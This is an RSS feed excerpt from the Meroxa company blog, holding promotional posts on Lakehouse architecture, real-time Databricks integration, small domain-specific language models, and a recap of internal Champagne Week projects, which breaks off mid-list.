&lt;p&gt;Let&apos;s get real—your data doesn&apos;t arrive in perfect little packages anymore. It&apos;s messy, it&apos;s diverse, and it&apos;s constantly evolving. Yet here we are, forcing JSON, logs, and IoT data through the equivalent of a data strainer just to make it warehouse-friendly. Spoiler alert: there&apos;s a better way, and it&apos;s called a Lakehouse.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Lakehouse Revolution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Let me share something exciting: Lakehouses are transforming how we handle data, especially when it comes to real-time streaming. Here&apos;s why this matters for your business.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Unified Architecture&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Imagine having all your data—structured and unstructured—working together seamlessly in one place. That&apos;s what Lakehouses deliver. They process your data in real-time, without the delays of traditional ETL processes that can slow you down.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Real-Time Analytics at Scale&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thanks to innovative table formats like Apache Iceberg, Delta Lake, and Apache Hudi, you&apos;ll get lightning-fast insights from your streaming data. Here&apos;s what makes this technology special:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Concurrency&lt;/strong&gt;: Your entire team can work with the data simultaneously—no more waiting your turn.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time Travel&lt;/strong&gt;: Need to look back at yesterday&apos;s data? No problem. Track changes and audit with ease.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema Evolution&lt;/strong&gt;: As your data needs change, your system adapts smoothly, keeping your operations running without interruption.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;3. Open Standards, Cloud-Native Flexibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s the best part: Lakehouses are built on open standards and cloud-native technology. This means you&apos;re not locked into any single vendor&apos;s ecosystem. You&apos;re free to choose the tools that work best for your team and adapt as your needs evolve.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Makes Your Lakehouse Journey Simple&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_picture_of_data_lake_architecture_technology3.png&quot; alt=&quot;dkeeton_17415_picture_of_data_lake_architecture_technology3.png&quot;&gt;
Ready to modernize your data architecture but feeling a bit overwhelmed? We get it. Moving to a Lakehouse involves several moving parts—but that&apos;s exactly why we&apos;re here to help you succeed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Your Real-Time Data Partner&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Think of Meroxa as your trusted guide in building &lt;strong&gt;real-time data pipelines&lt;/strong&gt;. We&apos;ve done the heavy lifting, creating a platform that turns complex data integration into a smooth, automated process. Your team can focus on what really matters: creating value from your data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Seamless Pipeline Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our &lt;strong&gt;stream processing platform&lt;/strong&gt; takes care of everything—from data ingestion to transformation and delivery. Whether you choose Apache Iceberg, Delta Lake, or Apache Hudi, our pre-built connectors and intuitive interface make setup a breeze.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Growth-Ready Architecture&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As your data needs grow, we grow with you. Our cloud-native platform automatically scales to match your demands while keeping costs in check. No more worrying about infrastructure—we&apos;ve got you covered.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Expert Migration Support&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Change can be challenging, but you&apos;re not alone. Our team of experts provides &lt;strong&gt;hands-on guidance&lt;/strong&gt; throughout your journey, from initial architecture design to final implementation. We&apos;re committed to your success every step of the way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Complete Visibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Stay in control with our &lt;strong&gt;comprehensive monitoring tools&lt;/strong&gt;. Track performance, spot potential issues early, and keep your data flowing smoothly. It&apos;s like having a mission control center for your data operations.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Take the Next Step&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The era of traditional data warehouses is coming to an end. Today&apos;s real-time data demands require a more agile, efficient approach—and that&apos;s exactly what the Lakehouse delivers.&lt;/p&gt;
&lt;p&gt;By combining the best of data lakes and warehouses with cutting-edge technology like Iceberg, Delta, and Hudi, the Lakehouse architecture opens up new possibilities for faster, more flexible data insights.&lt;/p&gt;
&lt;p&gt;Let Meroxa be your partner in this transformation. Whether you&apos;re starting fresh or upgrading from a legacy system, we have the expertise, tools, and support to make your transition successful. Don&apos;t let outdated technology hold you back—embrace the future of data architecture with Meroxa.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to transform your data architecture? Schedule a &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;demo&lt;/a&gt; today and see how Meroxa can accelerate your success.&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Analytics with Databricks and Meroxa's Conduit Platform AI]]></title><description><![CDATA[Discover how Meroxa's Conduit Platform AI empowers businesses to seamlessly integrate real-time data into Databricks for faster, smarter analytics. Learn how our platform reduces engineering effort by 60%, accelerates insights by 40%, and ensures 99.9% uptime with near-zero latency. From financial transactions to IoT data, this blog explores how Meroxa’s AI-driven pipelines simplify data movement, enabling you to unlock the full potential of Databricks for real-time decision-making.]]></description><link>https://meroxa.com/blog/real-time-analytics-with-databricks-and-meroxas-conduit-platform-ai</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-analytics-with-databricks-and-meroxas-conduit-platform-ai</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 19 Dec 2024 22:14:00 GMT</pubDate><content:encoded>&lt;p&gt;With the current state of data, businesses need real-time analytics to make faster, smarter decisions. While &lt;strong&gt;Databricks&lt;/strong&gt; excels in processing large datasets and enabling advanced analytics, the challenge lies in ensuring real-time, accurate, and reliable data integration. Enter &lt;strong&gt;Meroxa&apos;s Conduit Platform AI&lt;/strong&gt;, designed to simplify and optimize the flow of real-time data into Databricks with measurable advantages.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;The Challenge of Real-Time Analytics with Databricks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Databricks offers unparalleled analytics capabilities, but businesses face common hurdles when integrating real-time data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Complexity of Integration&lt;/strong&gt;: Building pipelines for real-time data from diverse sources requires significant engineering effort.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;High Latency&lt;/strong&gt;: Slow data delivery can make real-time analytics impossible.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability Issues&lt;/strong&gt;: Surging data volumes demand pipelines that can grow effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Maintenance&lt;/strong&gt;: Monitoring and troubleshooting pipelines take time and resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;How Meroxa&apos;s Conduit Platform AI Overcomes These Challenges&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_analytics_with_databricks2.png&quot; alt=&quot;dkeeton_17415_analytics_with_databricks2.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa&apos;s Conduit Platform AI provides a streamlined, scalable, and intelligent solution for real-time data integration with Databricks. Here’s how it delivers unique value:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Faster Time to Insights (Up to 40% Improvement)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit accelerates real-time data ingestion and processing, reducing pipeline setup and data delivery time by &lt;strong&gt;40%&lt;/strong&gt;, allowing Databricks users to act on insights faster than ever.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Pipeline Creation&lt;/strong&gt;: Build pipelines in minutes, not days.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AI-Driven Schema Adaptation&lt;/strong&gt;: Handles changes in data structure automatically, minimizing downtime.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Reduced Engineering Effort (60% Cost Savings)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Manual pipeline management consumes time and resources. Conduit eliminates &lt;strong&gt;60%&lt;/strong&gt; of the engineering effort needed for real-time data integration through AI automation.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Self-Healing Pipelines&lt;/strong&gt;: Detects and resolves issues without manual intervention.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-Code Interface&lt;/strong&gt;: Create and manage pipelines without deep coding expertise.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;3. Near-Zero Latency (Up to 30% Faster Delivery)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s platform ensures data streams with near-zero latency, improving delivery speed by &lt;strong&gt;up to 30%&lt;/strong&gt; for real-time analytics in Databricks.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Optimized Connectors&lt;/strong&gt;: Pre-built, high-performance connectors for common data sources like Kafka, Postgres, and more.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Data Routing&lt;/strong&gt;: Ensures low-latency streaming, even during peak data loads.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;4. Scalability and Resilience (99.9% Uptime)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is designed to scale seamlessly as your data grows while maintaining &lt;strong&gt;99.9% uptime&lt;/strong&gt;, ensuring uninterrupted analytics in Databricks.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Horizontal Scaling&lt;/strong&gt;: Automatically adjusts to increased data volumes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Load Balancing&lt;/strong&gt;: Distributes workloads efficiently to prevent bottlenecks.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;5. Proactive Monitoring and Visibility (50% Reduction in Downtime)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit’s real-time monitoring tools reduce pipeline downtime by &lt;strong&gt;50%&lt;/strong&gt;, giving you confidence in your data streams.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live Dashboards&lt;/strong&gt;: Monitor pipeline performance at a glance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Alerts&lt;/strong&gt;: Receive notifications before issues impact your analytics.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;Use Case: Streaming Financial Transactions into Databricks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;A fintech company processes millions of financial transactions daily and uses Databricks for fraud detection and customer insights.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Challenges&lt;/strong&gt;:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Integrating real-time transaction data from multiple sources.&lt;/li&gt;
&lt;li&gt;Maintaining low latency to detect fraud as it happens.&lt;/li&gt;
&lt;li&gt;Ensuring scalability during peak transaction periods.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Solution with Meroxa Conduit Platform AI&lt;/strong&gt;:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;40% Faster Time to Insights&lt;/strong&gt;: Real-time data from transactions is streamed into Databricks instantly, enabling near-instant fraud detection.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;60% Less Engineering Effort&lt;/strong&gt;: Automated pipelines save engineering resources, allowing teams to focus on fraud analytics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;99.9% Uptime&lt;/strong&gt;: Ensures uninterrupted data flow, even during high transaction periods.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;Unlock the Power of Real-Time Analytics&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_analytics_with_databricks3.png&quot; alt=&quot;dkeeton_17415_analytics_with_databricks3.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;By combining &lt;strong&gt;Databricks’ analytics capabilities&lt;/strong&gt; with the automation and intelligence of &lt;strong&gt;Meroxa’s Conduit Platform AI&lt;/strong&gt;, businesses can achieve faster, smarter, and more reliable real-time insights. Whether you&apos;re processing financial transactions, IoT data, or user behavior, our platform ensures that your analytics pipelines are optimized for success.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Start your real-time analytics journey today with Meroxa.&lt;/strong&gt; &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up&lt;/a&gt; to see how we can transform your data strategy.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Why Bigger Isn’t Always Better: The Case for Ditching LLMs in Favor of Tiny Models Powered by Real-Time Data]]></title><description><![CDATA[In the rapidly evolving world of AI, businesses are discovering that the future lies not in massive, general-purpose language models (LLMs) but in tiny, specialized models powered by real-time data streams. These domain-specific models offer dramatic cost savings, enhanced accuracy, and reduced hallucinations by continuously learning from live business data. From customer support to financial services and supply chain management, tiny models excel in delivering precise, actionable insights tailored to specific operations. Powered by platforms like Meroxa, which enables robust real-time data infrastructure, this approach bridges the gap between AI capabilities and business needs, providing a sustainable, efficient path to enterprise AI innovation.]]></description><link>https://meroxa.com/blog/why-bigger-isnt-always-better-the-case-for-ditching-llms-in-favor-of-tiny-models-powered-by-real-time-data</link><guid isPermaLink="false">https://meroxa.com/blog/why-bigger-isnt-always-better-the-case-for-ditching-llms-in-favor-of-tiny-models-powered-by-real-time-data</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 18 Dec 2024 23:17:00 GMT</pubDate><content:encoded>&lt;p&gt;As the CEO of Meroxa, I&apos;ve had a front-row seat to the AI revolution sweeping through the enterprise technology. Companies that just came to grips with having to become a data company are now scrambling to leverage AI to optimize huge parts of their business. While large language models (LLMs) like GPT-4, Claude, Llama, and Gemini have captured the public imagination, I&apos;m increasingly convinced that the future of practical AI applications lies in a different direction: tiny, specialized language models powered by real-time data streams.&lt;/p&gt;
&lt;h2&gt;The Hidden Costs of Large Language Models&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_llm_data_models.png&quot; alt=&quot;dkeeton_17415_llm_data_models.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s be frank: LLMs are impressive, but they come with significant drawbacks. Training these models requires massive computational resources, with costs running into millions of dollars. They consume enormous amounts of energy, making them environmentally questionable. And despite their size, they still struggle with hallucinations – those confident but incorrect responses that can wreak havoc in business applications.&lt;/p&gt;
&lt;p&gt;But perhaps most importantly, LLMs are fundamentally disconnected from your business&apos;s current reality. They&apos;re trained on historical internet data, not your organization&apos;s live, operational data. This disconnect creates a critical gap between AI capabilities and business needs.&lt;/p&gt;
&lt;h2&gt;The Tiny Model Advantage&lt;/h2&gt;
&lt;p&gt;This is where tiny language models shine. By &quot;tiny,&quot; I mean models that are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trained on specific domains rather than attempting to know everything&lt;/li&gt;
&lt;li&gt;Updated continuously with real-time data streams&lt;/li&gt;
&lt;li&gt;Optimized for specific business tasks rather than general-purpose conversation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The advantages are compelling:&lt;/p&gt;
&lt;h3&gt;1. Reduced Hallucinations Through Real-Time Data&lt;/h3&gt;
&lt;p&gt;Tiny models trained on current, streaming data are less likely to hallucinate because they&apos;re working with fresh, relevant information. When your model is continuously updated with real-time data from your actual business operations, it doesn&apos;t need to &quot;fill in the gaps&quot; with potentially incorrect information.&lt;/p&gt;
&lt;h3&gt;2. Dramatic Cost Reduction&lt;/h3&gt;
&lt;p&gt;The economics are straightforward. Training a tiny model on a specific domain requires:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Significantly less computational power&lt;/li&gt;
&lt;li&gt;Smaller training datasets&lt;/li&gt;
&lt;li&gt;Shorter training times&lt;/li&gt;
&lt;li&gt;Lower ongoing operational costs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We&apos;ve seen organizations reduce their AI training costs by 90% or more by switching to domain-specific tiny models.&lt;/p&gt;
&lt;h3&gt;3. Improved Relevancy and Accuracy&lt;/h3&gt;
&lt;p&gt;When your model is focused on a specific domain and continuously updated with real-time data, it becomes remarkably accurate within its scope. Instead of being &quot;okay&quot; at everything, it becomes excellent at what matters to your business.&lt;/p&gt;
&lt;h2&gt;Real-World Applications&lt;/h2&gt;
&lt;p&gt;Consider a few scenarios where tiny models excel:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Support&lt;/strong&gt;: Instead of using a general-purpose LLM, deploy a tiny model trained specifically on your product documentation, support tickets, and real-time customer interactions. The model stays current with product updates and emerging issues.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Financial Services&lt;/strong&gt;: Rather than relying on an LLM&apos;s outdated knowledge, use a tiny model that continuously learns from market data, transaction patterns, and regulatory updates.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Supply Chain Operations&lt;/strong&gt;: Deploy models that understand your specific inventory, logistics, and supplier relationships, updated in real-time as conditions change.&lt;/p&gt;
&lt;h2&gt;The Hybrid Approach&lt;/h2&gt;
&lt;p&gt;This isn&apos;t to say that LLMs don&apos;t have their place. A hybrid approach often works best:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use LLMs for broad, creative tasks where general knowledge is valuable&lt;/li&gt;
&lt;li&gt;Deploy tiny models for specific, business-critical operations where accuracy and currentness are paramount&lt;/li&gt;
&lt;li&gt;Leverage both in combination where appropriate&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Critical Role of Data Streams&lt;/h2&gt;
&lt;p&gt;Here&apos;s where the rubber meets the road: tiny models are only as good as the data they&apos;re trained on. The key to success is having robust, reliable data streams that can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Capture real-time business events&lt;/li&gt;
&lt;li&gt;Clean and prepare data automatically&lt;/li&gt;
&lt;li&gt;Feed models continuously for training and updates&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is why at Meroxa, we&apos;ve focused on building the infrastructure that makes this possible. Our platform enables organizations to create and manage the real-time data streams that power these next-generation AI systems.&lt;/p&gt;
&lt;h2&gt;Reference Architecture&lt;/h2&gt;
&lt;p&gt;To make this concrete, let&apos;s look at a reference architecture for implementing tiny language models with real-time data streams:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-flow-1x.png&quot; alt=&quot;mermaid-flow-1x.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This architecture shows how Meroxa serves as the foundation for real-time data processing that powers tiny language models. Let&apos;s break down the key components:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Ingestion&lt;/strong&gt;: Meroxa handles real-time data capture from various sources, ensuring no valuable information is lost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Stream Processing&lt;/strong&gt;: Our Turbine engine processes and transforms data in real-time, preparing it for model consumption.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storage&lt;/strong&gt;: A multi-tiered approach combines historical data for training with hot data for real-time inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML Pipeline&lt;/strong&gt;: Continuous training and evaluation ensure models stay current and accurate.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitoring&lt;/strong&gt;: Comprehensive monitoring helps detect data drift and trigger model updates when needed.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The beauty of this architecture is its ability to maintain model freshness while managing computational resources efficiently.&lt;/p&gt;
&lt;h2&gt;Getting Started&lt;/h2&gt;
&lt;p&gt;The path to implementing tiny models in your organization starts with your data infrastructure. Here&apos;s what you need:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Identify the specific domains where AI could add value&lt;/li&gt;
&lt;li&gt;Map out your data sources and streams&lt;/li&gt;
&lt;li&gt;Set up real-time data pipelines (this is where Meroxa comes in)&lt;/li&gt;
&lt;li&gt;Start small with a focused model in one domain&lt;/li&gt;
&lt;li&gt;Measure results and iterate&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;The Path Forward&lt;/h2&gt;
&lt;p&gt;As AI continues to evolve, the winners won&apos;t be those with the biggest models, but those with the most relevant ones. The combination of tiny models and real-time data streams represents a more sustainable, efficient, and effective approach to enterprise AI.&lt;/p&gt;
&lt;p&gt;Ready to explore how tiny models could transform your organization? Let&apos;s talk about how Meroxa can help you build the real-time data infrastructure that makes it possible. &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Champagne Week: Driving Innovation and Collaboration at Meroxa]]></title><description><![CDATA[Champagne Week embodies the creativity, dedication, and collaboration of the Meroxa team, showcasing innovative projects like enhanced documentation, real-time IoT processing, AI-powered summarization, and a collaborative demo that highlights our growth. Thank you to everyone who contributed to making this week a success—and to our users, who inspire us to keep raising the bar.]]></description><link>https://meroxa.com/blog/champagne-week-driving-innovation-and-collaboration-at-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/champagne-week-driving-innovation-and-collaboration-at-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 16 Dec 2024 16:04:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we celebrate innovation and teamwork during Champagne Week—a time when our team comes together to deliver impactful updates and enhancements. This year was no exception, featuring exciting projects that advance the Conduit platform and its ecosystem. Here’s a detailed look at the highlights from this year’s Champagne Week.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;1. Automated Connector Status Page&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;This project introduced a new &lt;strong&gt;Doctor Page&lt;/strong&gt; to streamline how we monitor and maintain our connectors. Previously, the Conduit team manually reviewed connectors to ensure they aligned with the latest versions of libraries and workflows. This project automates that process, offering a clearer and more efficient way to identify where attention is needed.&lt;/p&gt;
&lt;h3&gt;Key Features:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Checks:&lt;/strong&gt; The tool uses an existing weekly workflow to update the connector inventory and highlight connectors needing updates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Focus on Latest Releases:&lt;/strong&gt; Reduces noise by only fetching relevant versions, avoiding outdated pre-existing requests.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Clear Connector Statuses:&lt;/strong&gt; Provides an easy-to-read interface showing where action is required.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Future Improvements:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Introduce a &quot;mild&quot; status (orange) for connectors that use the same major and minor versions but not the latest patch.&lt;/li&gt;
&lt;li&gt;Enable URL updates based on filters for better shareability.&lt;/li&gt;
&lt;li&gt;Add additional fields like the number of open issues or pull requests.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To see the tool in action, visit: &lt;a href=&quot;https://conduit-doctor.conduit-site.pages.dev/doctor/&quot;&gt;Conduit Doctor Page&lt;/a&gt; and &lt;a href=&quot;https://youtu.be/ffBGI3yedzA&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Automated Document Summarization with Conduit, OpenAI, and Weaviate&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/2008&quot;&gt;Pull Request #2008&lt;/a&gt; introduced an automated pipeline for ingesting, processing, and summarizing documents. Using Conduit’s documentation as a dataset, this system leverages OpenAI and Weaviate to generate context-rich summaries.&lt;/p&gt;
&lt;h3&gt;Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Overview:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Source File:&lt;/strong&gt; Individual lines of text represent documents, creating a structured input format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processors:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Vectorization:&lt;/strong&gt; Generates embeddings for each document using OpenAI’s API.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Context Addition:&lt;/strong&gt; Retrieves related content from Weaviate to enhance summaries with relevant context.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Final Output:&lt;/strong&gt; Summaries are written to a destination file, ready for review or integration into workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Weaviate Integration:&lt;/strong&gt; The vector database stores both the text and its embeddings, enabling efficient contextual retrieval during processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Summaries:&lt;/strong&gt; Initial summaries were generic, but as more documents were processed and embeddings refined, the results became highly accurate and relevant.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This project exemplifies how Conduit can leverage AI and vector databases to handle real-time document summarization effectively. &lt;a href=&quot;https://youtu.be/AEvDw1NAN08&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. MQTT Connector: Real-Time IoT Data Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A major achievement during Champagne Week was the development of an MQTT connector, highlighted in this &lt;a href=&quot;https://www.loom.com/share/a63177d291344cad8bdfc16c9f76cd60&quot;&gt;demo video&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What is MQTT?&lt;/h3&gt;
&lt;p&gt;MQTT is a lightweight messaging protocol designed for resource-constrained environments like IoT devices, environmental monitoring systems, and industrial equipment. The MQTT connector allows seamless integration with Conduit pipelines, opening up new use cases in IoT and edge computing.&lt;/p&gt;
&lt;h3&gt;Key Features:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Flexible Topic Subscriptions:&lt;/strong&gt; Users can subscribe to or publish data to MQTT topics, including support for wildcards to capture a range of messages.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Integration:&lt;/strong&gt; MQTT messages can be routed to various outputs, such as file storage or Elasticsearch, for analysis and visualization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-World Use Case:&lt;/strong&gt; The demo showcased how CPU usage data from Raspberry Pi devices was processed through Conduit, stored in Elasticsearch, and visualized in Kibana dashboards. This demonstrated the connector’s capability to enable real-time monitoring of IoT devices.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This connector showcases how Conduit makes it simple to capture, process, and act on IoT data in real time. &lt;a href=&quot;https://youtu.be/luWWKjd0Ud4&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. AI Showcase: Vectorizing and Summarizing Pipelines&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Another exciting project during Champagne Week was an AI showcase demonstrating how Conduit supports popular AI use cases. The showcase featured two distinct pipelines—one for vectorizing data and another for summarizing content—both using test data stored in S3.&lt;/p&gt;
&lt;h3&gt;Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Vectorizing Pipeline:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Converts raw text into embeddings using OpenAI’s API.&lt;/li&gt;
&lt;li&gt;Preserves the original text alongside its embeddings.&lt;/li&gt;
&lt;li&gt;Logs the vectorized output, showcasing how it can be sent to destinations like vector databases.&lt;/li&gt;
&lt;li&gt;Demonstrates simplicity with a concise YAML configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Summarizing Pipeline:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Processes text using OpenAI to generate concise summaries.&lt;/li&gt;
&lt;li&gt;Example: Summarized test data about experiments with plants and sound waves, showcasing the pipeline’s ability to generate insightful summaries.&lt;/li&gt;
&lt;li&gt;Uses custom processors to shape data for summarization and output structured logs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Future Enhancements:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Work is ongoing to support additional file types like PDFs.&lt;/li&gt;
&lt;li&gt;Exploring specialized features to enhance ergonomics for AI use cases.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This project highlights Conduit’s versatility in enabling real-time AI workflows with minimal configuration. &lt;a href=&quot;https://youtu.be/tsVjc9fDuwA&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. Internal Collaboration and Knowledge Sharing: Champagne Week Demo&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Champagne Week isn’t just about shipping features—it’s also about teamwork and sharing successes. During the Champagne Week Demos, team members presented their projects, sharing insights, challenges, and future opportunities.&lt;/p&gt;
&lt;h3&gt;Key Takeaways:&lt;/h3&gt;
&lt;ul&gt;
